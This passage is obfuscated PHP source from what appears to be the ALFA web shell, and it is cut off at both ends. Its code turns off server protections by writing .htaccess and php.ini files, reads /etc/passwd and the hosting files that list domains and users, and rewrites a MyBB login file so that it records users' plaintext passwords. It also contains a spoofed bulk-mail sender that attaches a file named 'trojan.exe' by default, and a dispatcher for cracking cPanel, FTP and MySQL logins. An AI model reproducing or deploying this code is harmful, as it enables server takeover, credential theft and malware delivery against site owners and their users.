v66np; v66np: $site = trim($_POST["\x61\x6c\146\141\x37"]); goto oFWp6; oFWp6: $rep = str_replace(array("\150\x74\164\x70\x73\x3a\57\57", "\x68\164\164\x70\x3a\x2f\x2f", "\167\167\x77\56"), '', $site); goto sDZsh; sDZsh: $users = _alfa_file("\x2f\145\164\143\x2f\166\x69\x72\x74\165\x61\x6c\57\x64\157\155\x61\x69\x6e\157\167\156\x65\162\163"); goto DUnw_; DUnw_: foreach ($users as $boz) { $ex = explode("\x3a", $boz); if ($ex[0] == $rep) { echo __pre() . "\74\x63\x65\156\x74\x65\162\x3e\74\164\141\x62\x6c\145\40\x62\157\162\x64\145\x72\x3d\47\61\47\x3e\15\xa\74\164\x72\x3e\74\164\144\x3e\74\x62\76\x3c\146\x6f\x6e\x74\40\x63\x6f\154\157\x72\75\42\x23\x46\106\106\x46\106\x46\42\76\125\163\x65\x72\72\40\74\57\142\x3e\x3c\57\146\x6f\x6e\164\x3e\x3c\x2f\164\144\x3e\74\164\144\76\74\142\76\74\x66\157\156\x74\x20\143\x6f\x6c\157\x72\75\42\43\x46\106\60\x30\x30\60\x22\x3e" . trim($ex[1]) . "\x3c\x2f\x66\157\x6e\x74\x3e\x3c\x2f\142\76\74\x2f\x74\144\76\x3c\57\164\162\76\xd\xa\74\x74\x72\x3e\x3c\x74\x64\x3e\74\142\x3e\74\x66\x6f\156\x74\40\143\157\154\157\x72\x3d\42\43\x46\106\106\x46\x46\x46\42\76\x73\x69\164\x65\72\x20\x3c\57\x62\76\74\x2f\x66\x6f\x6e\164\76\x3c\57\x74\144\76\x3c\164\144\76\x3c\142\x3e\74\146\157\156\x74\40\x63\x6f\x6c\x6f\x72\75\x22\x23\106\x46\60\60\x30\60\42\x3e{$rep}\74\57\x66\x6f\x6e\x74\x3e\74\57\x62\x3e\74\x2f\x74\144\76\x3c\x2f\164\x72\x3e\74\57\x74\141\142\x6c\x65\76\74\57\143\x65\x6e\164\x65\162\76"; break; } } goto iDz3l; iDz3l: } } } goto GBzmh; HW43v: if (!empty($_POST["\141\154\x66\x61\62"]) && isset($_POST["\x61\x6c\x66\141\62"])) { @__write_file($GLOBALS["\143\x77\x64"] . "\x2e\150\x74\x61\x63\143\x65\x73\163", "\43\x47\145\156\145\x72\141\x74\145\x64\x20\x42\171\40\123\x6f\x6c\145\x20\123\x61\x64\x20\x61\156\x64\40\x49\x6e\166\x69\163\x69\x62\154\x65\12\x3c\111\146\x4d\157\144\x75\x6c\145\40\x6d\157\144\x5f\163\145\143\x75\x72\x69\164\x79\56\143\76\12\x53\x65\x63\x2d\55\55\x2d\55\55\x45\x6e\x67\151\x6e\145\40\x4f\146\146\xa\x53\x65\143\x2d\x2d\55\x2d\x2d\x2d\x53\143\x61\156\120\x4f\x53\124\40\117\x66\x66\12\x3c\57\111\146\x4d\157\x64\165\154\145\76"); echo "\x3c\143\x65\x6e\x74\x65\162\76\74\x62\76\74\x62\x69\147\x3e\x68\164\141\x63\x63\145\x73\163\x20\146\157\162\40\x41\x70\x61\143\150\145\40\x63\162\145\x61\x74\x65\x64\x2e\x2e\x2e\41\74\57\143\145\x6e\164\x65\162\x3e\74\57\142\76\74\57\142\x69\x67\76"; } goto rB3Sp; lpNgp: if (!empty($_POST["\x61\x6c\x66\141\63"]) && isset($_POST["\141\154\146\141\x33"])) { @__write_file($GLOBALS["\x63\x77\144"] . "\56\x68\164\141\143\x63\145\163\163", "\x23\107\145\x6e\145\x72\141\x74\145\144\40\102\171\40\123\157\x6c\145\x20\x53\141\x64\40\x61\x6e\x64\40\111\x6e\x76\x69\x73\151\x62\154\x65\12\74\106\151\154\x65\x73\x20\52\56\x70\x68\x70\76\xa\106\x6f\162\x63\145\124\171\160\145\40\x61\x70\160\x6c\x69\143\141\x74\x69\x6f\156\x2f\x78\55\150\164\x74\x70\x64\55\160\x68\160\64\xa\x3c\x2f\x46\151\154\x65\163\x3e\12\x3c\111\x66\115\x6f\144\165\x6c\x65\40\x6d\x6f\144\x5f\x73\145\143\x75\x72\x69\164\x79\56\x63\76\xa\123\x65\x63\106\x69\x6c\164\145\x72\x45\x6e\147\151\x6e\145\x20\x4f\146\x66\12\x53\x65\143\x46\151\x6c\164\145\162\x53\x63\x61\x6e\x50\x4f\123\124\40\x4f\x66\x66\xa\x3c\57\x49\x66\x4d\157\x64\x75\x6c\x65\76"); echo "\74\x63\145\x6e\164\x65\x72\76\x3c\142\x3e\74\x62\x69\x67\76\150\x74\x61\143\x63\x65\x73\163\40\x66\157\162\x20\x4c\151\x74\x65\163\160\145\x65\144\40\143\162\x65\x61\164\x65\x64\x2e\x2e\x2e\x21\74\x2f\143\x65\156\x74\x65\162\76\74\57\142\x3e\74\x2f\142\x69\147\x3e"; } goto iVAwS; rB3Sp: if (!empty($_POST["\141\154\146\141\x31"]) && isset($_POST["\x61\154\x66\141\61"])) { @__write_file($GLOBALS["\143\x77\144"] . "\x70\x68\x70\x2e\151\x6e\x69", "\163\141\x66\145\x5f\155\x6f\144\145\x3d\x4f\106\106\12\x64\151\163\141\x62\154\x65\137\x66\x75\156\143\x74\x69\157\156\163\75\102\x79\x50\141\x73\x73\145\144\x20\x42\x79\40\x53\157\x6c\145\40\x53\x61\x64\40\x26\x20\x49\x6e\x76\x69\163\151\x62\x6c\x65\x28\x41\x4c\x46\101\40\124\x45\141\115\51"); echo "\x3c\143\x65\x6e\164\145\x72\x3e\74\x62\76\74\142\x69\147\76\x20\x70\x68\x70\56\x69\156\x69\x20\143\x72\x65\x61\164\145\x64\56\x2e\x2e\x21\x3c\x2f\143\145\x6e\164\145\x72\x3e\74\57\x62\x3e\x3c\x2f\142\151\x67\x3e"; } goto lpNgp; fs_iB: echo "\74\x64\151\166\x20\x63\x6c\x61\x73\163\75\x68\145\141\x64\x65\x72\76\74\x63\145\156\164\x65\162\x3e\x3c\142\162\x3e\x3c\144\x69\x76\x20\143\154\141\x73\163\75\47\x74\170\x74\x66\x6f\x6e\164\x5f\150\x65\141\144\x65\162\47\x3e\x7c\x20\101\x75\x74\157\x20\102\171\120\x61\163\x73\145\x72\40\x7c\x3c\x2f\144\x69\166\x3e"; goto hHL1K; L4Keo: alfahead(); goto fs_iB; Kux6T: alfafooter(); goto toNMr; hHL1K: echo "\x3c\x68\63\x3e\x3c\x61\x20\150\162\145\x66\x3d\152\141\166\141\x73\x63\162\x69\x70\164\72\166\157\x69\x64\x28\60\51\x20\157\x6e\143\x6c\151\x63\x6b\x3d\42\x67\x28\x27\163\x61\x66\x65\x27\x2c\x6e\x75\x6c\154\54\x27\x70\x68\x70\x2e\151\x6e\x69\47\x2c\156\x75\154\x6c\51\42\76\174\x20\x50\x48\x50\56\111\116\x49\x20\x7c\x20\74\x2f\141\76\x3c\141\40\150\162\x65\x66\x3d\152\141\x76\x61\163\x63\x72\151\x70\164\x3a\x76\x6f\x69\144\50\x30\x29\x20\157\156\x63\154\151\143\x6b\x3d\42\147\50\x27\x73\x61\146\x65\x27\54\156\x75\x6c\x6c\x2c\156\165\x6c\154\54\47\151\156\x69\47\51\x22\x3e\174\40\56\x68\164\x61\143\143\145\x73\x73\50\x61\160\x61\x63\150\x65\x29\x20\174\x20\x3c\x2f\141\76\x3c\141\x20\150\162\x65\x66\75\152\x61\166\x61\163\x63\162\151\160\x74\x3a\x76\157\x69\144\x28\x30\51\40\x6f\x6e\x63\154\x69\x63\x6b\75\42\x67\50\x27\163\141\146\x65\x27\54\x6e\x75\154\154\x2c\x6e\165\x6c\x6c\54\x6e\165\154\x6c\x2c\47\x70\x6c\47\51\x22\x3e\174\40\x2e\x68\x74\141\143\x63\145\163\163\x28\x4c\151\x74\145\x53\x70\145\x65\x64\x29\x20\x7c\x3c\57\x61\76\x3c\x61\x20\x68\x72\x65\146\x3d\152\141\166\x61\163\x63\162\151\160\x74\72\x76\157\151\x64\x28\x30\51\40\x6f\x6e\143\154\x69\x63\153\75\42\147\50\47\x73\141\146\x65\x27\54\x6e\x75\x6c\x6c\54\156\x75\154\x6c\x2c\156\x75\154\x6c\54\156\x75\x6c\x6c\54\x27\160\x61\163\x73\x77\144\x27\51\x22\76\174\x20\x52\145\x61\144\55\x50\x61\163\163\x77\x64\x20\x7c\x20\x3c\57\141\76\x3c\141\x20\x68\162\145\146\75\152\141\x76\x61\163\x63\162\x69\x70\164\72\166\157\x69\x64\50\60\x29\x20\x6f\x6e\x63\x6c\151\143\153\75\42\x67\x28\47\163\x61\146\145\x27\54\x6e\165\154\154\54\x6e\x75\154\x6c\54\156\x75\154\x6c\x2c\x6e\x75\x6c\x6c\x2c\x6e\x75\154\154\54\47\x75\163\145\x72\163\x27\51\42\76\x7c\x20\122\145\141\144\x2d\125\x73\145\162\163\x20\x7c\x20\x3c\57\x61\76\x3c\x61\40\x68\162\x65\x66\x3d\152\141\x76\x61\163\x63\162\151\160\164\x3a\166\157\151\144\x28\60\51\40\x6f\x6e\x63\x6c\x69\143\153\x3d\x22\x67\x28\x27\163\x61\146\x65\47\x2c\156\165\x6c\x6c\54\x6e\x75\x6c\154\x2c\156\165\154\x6c\54\x6e\165\x6c\x6c\54\156\165\x6c\154\54\156\165\154\x6c\54\47\166\x61\154\151\141\x73\x65\x73\47\51\42\x3e\x7c\40\x47\x65\x74\55\x55\163\145\162\40\x7c\40\74\57\x61\76\74\141\x20\x68\x72\145\146\x3d\152\141\x76\x61\163\x63\x72\x69\x70\164\72\x76\x6f\151\144\50\x30\x29\40\157\156\x63\154\151\143\153\x3d\x22\147\x28\x27\163\141\x66\x65\x27\54\156\165\x6c\154\x2c\x6e\165\x6c\154\54\x6e\165\154\x6c\x2c\x6e\165\154\154\54\156\165\154\154\x2c\x6e\x75\x6c\154\54\156\165\154\154\x2c\x6e\165\154\x6c\x2c\47\x64\157\155\141\x69\156\x73\47\x29\42\76\174\40\x47\145\164\55\x44\x6f\x6d\x61\151\156\x73\40\x7c\40\74\57\x61\76\74\57\x63\145\x6e\x74\x65\x72\x3e\x3c\x2f\150\63\x3e"; goto zKjbR; zKjbR: if (!empty($_POST["\141\154\x66\x61\70"]) && isset($_POST["\x61\x6c\146\x61\70"]) == "\x64\x6f\155\x61\x69\156\x73") { if (!_alfa_file_exists("\57\145\x74\143\x2f\x76\x69\x72\164\x75\x61\154\57\144\x6f\x6d\141\x69\156\157\167\x6e\x65\x72\x73")) { goto IxjQi; O1lD9: if (is_array($solevisible9)) { foreach ($solevisible9 as $solevisible13) { if (@eregi("\x7a\x6f\156\145", $solevisible13)) { preg_match_all("\x23\172\157\156\x65\40\42\50\56\x2a\x29\x22\x23", $solevisible13, $solevisible14); if (strlen(trim($solevisible14[1][0])) > 2) { echo $solevisible14[1][0] . "\74\142\x72\76"; } } } } goto D2K40; IxjQi: echo __pre(); goto uqdId; uqdId: $solevisible9 = _alfa_file("\x2f\x65\164\143\x2f\156\x61\155\145\144\56\143\157\156\x66"); goto O1lD9; D2K40: } else { goto sN_ct; nscsa: $users = _alfa_file("\57\x65\x74\143\x2f\x76\x69\x72\164\165\x61\x6c\57\144\x6f\155\141\151\x6e\x6f\x77\156\x65\x72\163"); goto n4oAN; n4oAN: if (is_array($users)) { foreach ($users as $boz) { $dom = explode("\x3a", $boz); echo $dom[0] . "\xa"; } } goto HjnLL; sN_ct: echo __pre(); goto nscsa; HjnLL: } } goto k64wG; AOg4o: if (!empty($_POST["\141\154\146\x61\x34"]) && isset($_POST["\141\154\146\141\x34"])) { echo __pre(); if (_alfa_can_runCommand(true, true)) { echo __read_file("\57\145\164\143\x2f\x70\x61\x73\163\x77\x64"); } elseif (function_exists("\160\157\163\151\x78\x5f\147\145\x74\160\x77\x75\151\144")) { for ($uid = 0; $uid < 60000; $uid++) { $ara = @posix_getpwuid($uid); if (!empty($ara)) { while (list($key, $val) = each($ara)) { echo "{$val}\x3a"; } echo "\12"; } } } else { __alert("\x66\141\151\154\x65\144\x2e\x2e\56"); } } goto HW43v; GBzmh: if (!empty($_POST["\141\x6c\x66\x61\65"]) && isset($_POST["\x61\154\146\141\65"])) { if (!_alfa_file_exists("\x2f\145\164\143\57\x76\x69\x72\164\x75\141\154\x2f\x64\157\x6d\141\151\156\x6f\167\x6e\x65\162\163")) { goto neO9I; QtBf9: while ($i < 60000) { $line = @posix_getpwuid($i); if (!empty($line)) { while (list($key, $vl) = each($line)) { echo $vl . "\12"; break; } } $i++; } goto g9qoT; neO9I: echo __pre(); goto Dr9Q8; Dr9Q8: $i = 0; goto QtBf9; g9qoT: } else { goto QIMWv; UXqGt: $users = _alfa_file("\57\x65\x74\x63\x2f\166\151\x72\x74\165\x61\154\57\x64\157\x6d\x61\151\156\x6f\x77\156\x65\x72\x73"); goto g4f2H; QIMWv: echo __pre(); goto UXqGt; g4f2H: foreach ($users as $boz) { $user = explode("\72", $boz); echo trim($user[1]) . "\74\x62\x72\x3e"; } goto m39hC; m39hC: } } goto AOg4o; toNMr: } goto veOxe; QZJSD: function hijackMybb($path, $saveto) { goto vOMut; CY9CF: $code = str_replace("\173\163\141\x76\145\164\x6f\x5f\x70\141\x74\x68\x7d", $saveto, $code); goto JeiC3; rWxsA: $evil_login = "\11" . $code . "\xa\11" . $find; goto oON1h; vOMut: $code = "\44\x61\x6c\146\x61\137\161\x20\75\40\x24\144\142\55\x3e\161\165\145\x72\171\50\42\123\105\114\x45\103\124\x20\x60\145\155\141\x69\154\140\40\x46\x52\117\115\40\x22\56\124\x41\102\x4c\105\137\x50\x52\x45\106\x49\x58\56\x22\165\163\x65\162\163\x20\x57\x48\x45\x52\x45\x20\x60\165\x73\145\162\156\141\155\x65\x60\x20\x3d\40\47\x22\x2e\44\x75\x73\x65\162\133\x27\165\163\x65\x72\x6e\141\x6d\x65\x27\x5d\x2e\42\x27\x22\x29\x3b\44\x61\x6c\x66\141\x5f\x66\145\164\143\150\x20\75\40\x24\144\142\55\x3e\x66\145\164\143\150\x5f\141\162\162\x61\171\x28\44\x61\x6c\146\141\137\x71\x29\x3b\44\x61\154\146\x61\x5f\x66\151\154\145\x20\75\40\x22\x7b\163\x61\x76\145\164\x6f\x5f\x70\141\164\150\175\x22\73\x24\x66\x70\x20\75\40\100\x66\x6f\160\145\156\x28\x24\x61\x6c\x66\141\x5f\146\x69\x6c\145\54\40\x22\x61\53\x22\51\x3b\100\146\x77\x72\x69\164\145\50\x24\x66\160\54\40\44\165\x73\x65\x72\x5b\x27\x75\x73\145\x72\x6e\x61\x6d\145\x27\x5d\56\x22\x20\x3a\40\x22\x2e\40\x24\x75\163\145\x72\x5b\x27\160\x61\x73\x73\x77\x6f\162\x64\47\x5d\x2e\x22\40\x28\x20\x22\56\44\x61\154\146\x61\137\146\x65\164\143\150\133\x27\x65\155\141\x69\x6c\x27\135\56\x22\x20\51\134\156\x22\x29\x3b\x40\x66\143\x6c\157\x73\145\50\44\146\x70\51\73\44\146\40\75\40\x40\146\x69\x6c\x65\50\x24\x61\154\x66\x61\137\x66\x69\x6c\145\51\73\x24\x6e\145\x77\40\75\40\141\162\162\141\x79\137\x75\156\x69\x71\165\x65\50\44\x66\x29\73\44\146\160\x20\x3d\40\x40\x66\157\160\x65\156\50\44\141\x6c\146\x61\137\x66\x69\154\x65\54\40\x22\x77\x22\x29\73\x66\x6f\x72\x65\141\x63\150\x28\x24\156\145\167\x20\141\163\x20\x24\x76\141\154\165\145\x73\51\173\x40\x66\x77\162\151\x74\x65\50\x24\146\160\x2c\40\44\x76\141\154\165\145\x73\x29\73\175\100\x66\x63\x6c\x6f\163\x65\50\x24\146\x70\x29\x3b"; goto ss1k8; oON1h: if (@is_file($login) and @is_writable($login)) { $data_login = @file_get_contents($login); if (strstr($data_login, $find)) { goto OKhfN; OKhfN: $login_replace = str_replace($find, $evil_login, $data_login); goto FI2uU; tj8_o: hijackOutput(0, $saveto); goto aL7JB; FI2uU: @file_put_contents($login, $login_replace); goto tj8_o; aL7JB: } else { hijackOutput(1); } } else { hijackOutput(1); } goto LZtGk; JeiC3: $login = $path . "\57\155\x65\x6d\142\145\x72\56\160\150\x70"; goto rWxsA; ss1k8: $find = "\44\x6c\157\x67\151\x6e\x68\x61\x6e\144\154\x65\x72\x2d\x3e\x63\157\x6d\160\154\145\x74\145\137\154\157\x67\x69\x6e\50\51\x3b"; goto CY9CF; LZtGk: } goto a111_; OTgQa: $GLOBALS["\x4e\x65\125\x53\x4d\171\x50\107\130\120"] = array("\165\x73\x6d\146\x7a\155\x6c\x48\x46\103\152\x65" => "\141\144\x6d\151\x6e", "\160\x61\114\104\x52\150\x48\146\101\x6f\166\165" => "\141\x36\146\x34\x35\62\x65\x63\x33\62\x39\x33\144\67\x66\142\x37\62\143\65\142\66\67\67\62\x35\67\x62\62\x30\145\x63", "\x73\141\105\x75\105\147\156\x44\x6c\x48\165\x4c" => "\61", "\154\157\147\x58\113\124\146\121\x50\116\x63\170" => "\147\x75\x69", "\163\150\151\112\x56\121\x68\125\162\106\153\167" => "\61", "\160\x6f\x67\153\125\x7a\115\151\x41\152\161\102" => true); goto zatc1; MYobS: function _alfa_symlink($target, $link) { $phpsym = function_exists("\163\171\155\154\151\x6e\x6b"); if ($phpsym) { @symlink($target, $link); } else { alfaEx("\x6c\x6e\40\55\163\x20\x27" . addslashes($target) . "\47\x20\x27" . addslashes($link) . "\x27"); } } goto a6F74; ZkSgh: function alfamail() { goto mzVVK; geA4g: echo "\74\144\151\166\40\x63\154\141\163\163\x3d\150\145\x61\144\145\162\x3e"; goto pD2ao; YgOkp: echo "\74\x63\145\x6e\x74\145\x72\76\x3c\160\76\x3c\x64\151\x76\x20\x63\154\x61\x73\163\75\42\x74\x78\x74\146\157\156\x74\x5f\x68\145\x61\x64\145\162\x22\x3e\x7c\x20\106\141\x6b\x65\40\115\x61\x69\154\x20\174\x3c\x2f\x64\x69\x76\x3e\x3c\57\160\76\x3c\x66\x6f\162\155\x20\141\143\x74\x69\x6f\156\x3d\x22\x22\40\155\x65\164\150\x6f\x64\x3d\x22\x70\x6f\163\x74\42\x20\157\x6e\163\x75\142\x6d\151\164\x3d\42\x67\50\x27\x6d\141\x69\154\x27\x2c\x6e\165\154\x6c\x2c\x74\x68\x69\163\56\155\141\151\x6c\x5f\164\x6f\x2e\166\141\x6c\165\x65\x2c\164\150\151\163\x2e\155\141\151\x6c\x5f\146\x72\157\x6d\x2e\166\x61\154\165\145\54\164\150\151\163\56\155\141\x69\x6c\137\163\x75\142\x6a\x65\x63\164\x2e\x76\x61\154\165\145\x2c\x27\76\x3e\x27\x2c\x74\150\151\x73\56\x6d\x61\x69\154\137\x63\157\x6e\x74\145\x6e\x74\x2e\x76\141\x6c\x75\145\x2c\x74\150\x69\x73\x2e\143\x6f\x75\x6e\164\x5f\155\x61\x69\154\x2e\x76\x61\x6c\165\145\x2c\164\x68\151\163\56\x6d\141\151\x6c\137\141\x74\164\141\x63\150\x2e\x76\141\154\165\145\51\x3b\40\162\x65\x74\165\162\x6e\x20\146\141\154\163\x65\x3b\x22\76"; goto RVXLx; klkRS: echo "\74\160\76\x3c\144\151\166\x20\x63\x6c\x61\x73\163\75\x22\164\170\164\x66\157\156\x74\42\76\115\x65\x73\163\x61\147\145\x3a\74\x2f\144\x69\x76\76\x3c\57\x70\76\x3c\164\x65\x78\x74\141\162\145\141\40\x72\x6f\167\x73\x3d\x22\x36\42\40\143\x6f\x6c\x73\75\42\66\x30\42\40\156\x61\x6d\x65\x3d\x22\x6d\141\151\154\137\143\x6f\x6e\164\x65\x6e\164\42\76\x48\151\x20\x44\145\141\162\x20\x41\x64\155\151\156\40\72\51\74\57\164\x65\170\x74\x61\162\x65\x61\76\x3c\160\76\x3c\151\156\160\x75\164\40\x74\x79\x70\145\75\x22\163\x75\x62\155\x69\x74\x22\40\166\141\154\165\x65\75\42\40\42\40\156\x61\x6d\145\75\x22\x6d\x61\151\x6c\x5f\163\145\x6e\x64\x22\x20\x2f\76\x3c\x2f\160\76\x3c\x2f\x66\x6f\x72\155\x3e\74\57\x63\145\x6e\164\145\162\76"; goto bnAH5; piMfE: alfafooter(); goto axgM8; bnAH5: if (isset($_POST["\x61\x6c\146\141\x34"]) && $_POST["\x61\x6c\x66\141\x34"] == "\76\76") { goto G8EKz; X3kFz: $mail_from = $_POST["\141\x6c\x66\141\x32"]; goto zzKxl; ONdWM: $count_mail = (int) $_POST["\x61\x6c\x66\141\x36"]; goto MR9_B; ySa2U: if (filter_var($mail_to, FILTER_VALIDATE_EMAIL)) { goto w1tnM; s4kZa: if (!empty($mail_from)) { echo __pre(); for ($i = 1; $i <= $count_mail; $i++) { if (@mail($mail_to, $mail_subject, $mail_content, $headers)) { echo "\74\143\145\x6e\164\145\162\76\x53\145\x6e\x74\40\55\76\x20{$mail_to}\74\142\162\76\74\x2f\143\x65\x6e\164\145\x72\76"; } } } else { __alert("\x49\156\166\x61\154\x69\144\x20\115\x61\151\x6c\x20\x46\x72\x6f\x6d\40\x21"); } goto EBwOR; w1tnM: if (!empty($mail_attach) && @is_file($mail_attach)) { goto QYwRr; Mzlmy: $mail_content .= "\x43\157\x6e\164\145\x6e\164\55\124\171\160\145\72\40\x61\x70\160\x6c\151\x63\141\x74\151\x6f\156\57\x6f\143\x74\x65\x74\55\163\x74\162\145\x61\155\x3b\40\x6e\141\155\145\x3d\42" . $filename . "\42\xd\12"; goto ZzzS9; OPXUI: $headers .= "\x4d\x49\115\x45\x2d\126\145\162\x73\x69\x6f\x6e\72\x20\x31\56\x30" . "\15\xa"; goto byqEo; CO2UT: $mail_content .= "\103\x6f\x6e\x74\x65\156\164\55\164\171\160\145\x3a\x74\145\170\164\57\x70\154\141\x69\x6e\73\x20\143\150\141\162\x73\x65\x74\x3d\151\163\x6f\x2d\70\x38\x35\x39\55\61\xd\12"; goto jt6nN; TUbt9: $headers .= "\x52\145\x70\x6c\x79\55\x54\157\72\x20" . $mail_from . "\15\12"; goto ODeam; mCLD1: $content = __read_file($file); goto M1zfS; tycuj: $mail_content .= "\103\x6f\156\164\145\156\x74\55\x44\x69\163\160\157\163\151\164\x69\157\156\x3a\40\x61\164\x74\141\x63\150\155\145\156\164\x3b\40\146\x69\154\145\156\x61\155\145\75\42" . $filename . "\x22\xd\12\15\xa"; goto xJL3B; h2Hh9: $mail_content .= $mail_content . "\15\12\15\xa"; goto La31o; zLL76: $uid = md5(uniqid(time())); goto wIGK3; z5MAC: $mail_content = "\55\x2d" . $uid . "\15\12"; goto CO2UT; xJL3B: $mail_content .= $content . "\15\xa\15\12"; goto in32s; QYwRr: $file = $mail_attach; goto mCLD1; ODeam: $headers .= "\x43\157\156\164\x65\156\164\55\124\171\x70\x65\x3a\40\x6d\x75\x6c\164\151\160\141\x72\164\x2f\155\151\170\x65\144\x3b\40\x62\x6f\x75\156\x64\141\x72\x79\x3d\42" . $uid . "\x22\xd\xa\15\12"; goto OPXUI; SHHAG: $headers .= "\x54\157\x3a\x20" . $mail_to . "\40\50\40" . $mail_to . "\40\x29\40\xd\12"; goto TUbt9; ZzzS9: $mail_content .= "\103\157\x6e\x74\x65\x6e\164\55\124\162\141\156\x73\146\x65\162\x2d\x45\x6e\143\157\x64\x69\x6e\147\72\x20\x62\x61\163\145\66\64\15\12"; goto tycuj; in32s: $mail_content .= "\55\x2d" . $uid . "\x2d\55"; goto uFhZT; M1zfS: $content = chunk_split(__ZW5jb2Rlcg($content)); goto zLL76; La31o: $mail_content .= "\55\x2d" . $uid . "\xd\12"; goto Mzlmy; wIGK3: $filename = basename($file); goto yEtdc; byqEo: $headers .= "\130\x2d\x4d\x61\151\x6c\145\162\72\40\160\x68\x70" . "\15\12"; goto z5MAC; jt6nN: $mail_content .= "\103\157\x6e\x74\145\156\x74\x2d\124\162\x61\156\x73\x66\145\x72\x2d\105\x6e\x63\x6f\x64\x69\x6e\x67\72\40\67\142\151\164\xd\xa\xd\xa"; goto h2Hh9; yEtdc: $headers = "\106\x72\157\155\x3a\x20" . $mail_from . "\40\74" . $mail_from . "\x3e\xd\12"; goto SHHAG; uFhZT: } else { goto cGUiS; FeF6a: $headers .= "\115\x49\x4d\105\x2d\126\x65\162\163\x69\157\156\72\x20\61\x2e\60" . "\15\xa"; goto Nr30P; Nr30P: $headers .= "\130\55\x4d\141\x69\154\x65\x72\x3a\40\x70\150\x70" . "\15\xa"; goto epU3p; LuWgw: $headers .= "\103\x6f\x6e\x74\145\156\164\55\x74\x79\160\145\72\40\164\x65\x78\164\x2f\150\164\155\x6c\73\x20\x63\150\141\162\163\x65\164\x3d\x75\x74\x66\x2d\x38" . "\15\xa"; goto FeF6a; siLLy: $headers .= "\x54\x6f\72\40" . $mail_to . "\40\50\x20" . $mail_to . "\40\x29\40\15\12"; goto he5O1; he5O1: $headers .= "\122\145\x70\x6c\171\55\x54\157\72\x20" . $mail_from . '' . "\15\12"; goto LuWgw; cGUiS: $headers = "\106\x72\x6f\x6d\x3a\40" . $mail_from . "\x20\50\x20" . $mail_from . "\40\x29\40\15\12"; goto siLLy; epU3p: } goto XH_bm; XH_bm: if (empty($count_mail) || $count_mail < 1) { $count_mail = 1; } goto s4kZa; EBwOR: } else { __alert("\111\156\x76\141\x6c\151\x64\x20\x4d\141\151\x6c\x20\x54\x6f\40\x21"); } goto tBR1Q; PYpR3: $mail_content = $_POST["\x61\154\x66\x61\x35"]; goto ONdWM; G8EKz: $mail_to = $_POST["\x61\154\146\141\x31"]; goto X3kFz; MR9_B: $mail_attach = $_POST["\141\x6c\146\141\x37"]; goto ySa2U; zzKxl: $mail_subject = $_POST["\x61\x6c\146\141\x33"]; goto PYpR3; tBR1Q: } goto ouaPh; RVXLx: $table = array("\164\144\61" => array("\143\x6f\x6c\x6f\162" => "\x46\106\x46\106\106\106", "\x74\x64\116\x61\x6d\x65" => "\x4d\x61\x69\x6c\x20\x54\x6f\x20\72\40", "\151\x6e\160\x75\x74\116\x61\x6d\145" => "\155\x61\x69\154\137\x74\157", "\x69\x6e\x70\165\164\x56\141\154\x75\145" => "\164\x61\162\x67\145\164\100\x66\142\151\x2e\147\x6f\166", "\151\156\160\x75\164\x53\x69\172\x65" => "\x36\x30", "\160\x6c\x61\143\145\150\x6f\x6c\x64\x65\x72" => true), "\x74\x64\62" => array("\143\x6f\154\157\162" => "\x46\x46\106\x46\106\x46", "\164\144\x4e\141\x6d\145" => "\106\162\x6f\x6d\x20\x3a\x20", "\x69\156\160\x75\x74\x4e\x61\x6d\x65" => "\x6d\141\x69\154\x5f\x66\162\157\155", "\151\x6e\x70\165\x74\126\x61\x6c\165\145" => "\x73\145\x63\x40\x67\157\157\147\154\145\x2e\143\x6f\155", "\x69\156\160\165\x74\x53\x69\172\145" => "\x36\x30", "\x70\154\x61\143\x65\x68\x6f\x6c\144\145\162" => true), "\x74\144\x33" => array("\x63\157\x6c\x6f\x72" => "\x46\x46\106\106\106\x46", "\164\144\x4e\141\155\x65" => "\123\x75\142\152\145\143\x74\40\x3a\x20", "\151\x6e\160\165\x74\116\x61\x6d\145" => "\155\x61\x69\154\x5f\x73\165\x62\152\x65\143\x74", "\151\x6e\x70\x75\x74\x56\x61\x6c\x75\x65" => "\x79\x6f\165\x72\x20\x73\x69\164\x65\40\150\x61\143\153\145\x64\x20\x62\x79\x20\155\x65", "\x69\x6e\160\165\x74\123\151\172\145" => "\x36\x30"), "\164\144\64" => array("\x63\x6f\154\157\162" => "\x46\x46\x46\x46\106\x46", "\x74\x64\116\141\x6d\x65" => "\x41\x74\164\141\x63\150\x20\x46\151\x6c\145\40\x3a\x20", "\x69\156\x70\x75\164\116\x61\155\x65" => "\x6d\x61\151\x6c\x5f\141\x74\x74\141\143\x68", "\x69\x6e\x70\165\x74\126\141\x6c\165\145" => $GLOBALS["\x63\167\x64"] . "\164\162\157\152\141\156\56\145\170\145", "\x69\156\x70\x75\164\x53\x69\172\x65" => "\66\60"), "\164\144\65" => array("\x63\x6f\154\157\x72" => "\106\x46\106\x46\106\x46", "\164\x64\x4e\x61\155\x65" => "\x43\x6f\165\156\x74\x20\115\x61\151\x6c\x20\72\x20", "\151\156\160\165\x74\x4e\141\155\x65" => "\x63\x6f\x75\x6e\164\137\x6d\x61\151\154", "\x69\x6e\160\x75\x74\126\x61\x6c\165\x65" => "\x31", "\x69\156\160\x75\164\123\x69\172\145" => "\x36\60")); goto TK8xA; TK8xA: create_table($table); goto klkRS; mzVVK: alfahead(); goto geA4g; ouaPh: echo "\74\x2f\x64\x69\166\x3e"; goto piMfE; pD2ao: AlfaNum(8, 9, 10); goto YgOkp; axgM8: } goto AZtgr; tgUps: $GLOBALS["\137\x5f\x66\151\x6c\145\x5f\x70\x61\x74\150"] = str_replace("\134", "\x2f", trim(preg_replace("\x21\x5c\x28\x5c\144\x2b\134\51\x5c\x73\56\x2a\41", '', __FILE__))); goto fyd7O; ojyU9: if (!isset($GLOBALS["\104\x42\137\116\x41\x4d\x45"]["\x75\163\145\162"])) { exit("\x24\107\x4c\117\x42\101\x4c\123\133\47\104\x42\x5f\116\101\x4d\105\47\135\x5b\47\165\163\145\x72\x27\x5d"); } goto DvW2j; jF6QH: function Alfa_Call_Function_Cracker($method, $info) { switch ($method) { case "\x63\x70": return Alfa_CP_Cracker($info); break; case "\x64\x69\162\145\143\164": case "\x70\x68\x70\155\x79\x61\x64\155\x69\156": return Alfa_DirectAdmin_Cracker($info); break; case "\146\x74\x70": return Alfa_FTP_Cracker($info); break; case "\155\171\x73\x71\154": return Alfa_Mysql_Cracker($info); break; case "\155\x79\163\x71\154": return Alfa_FTPC($info); break; } } goto P67H4; DWLcl: function alfaproc() { goto q4KjS; LoqkT: alfafooter(); goto GUl5P; BZc7o: echo 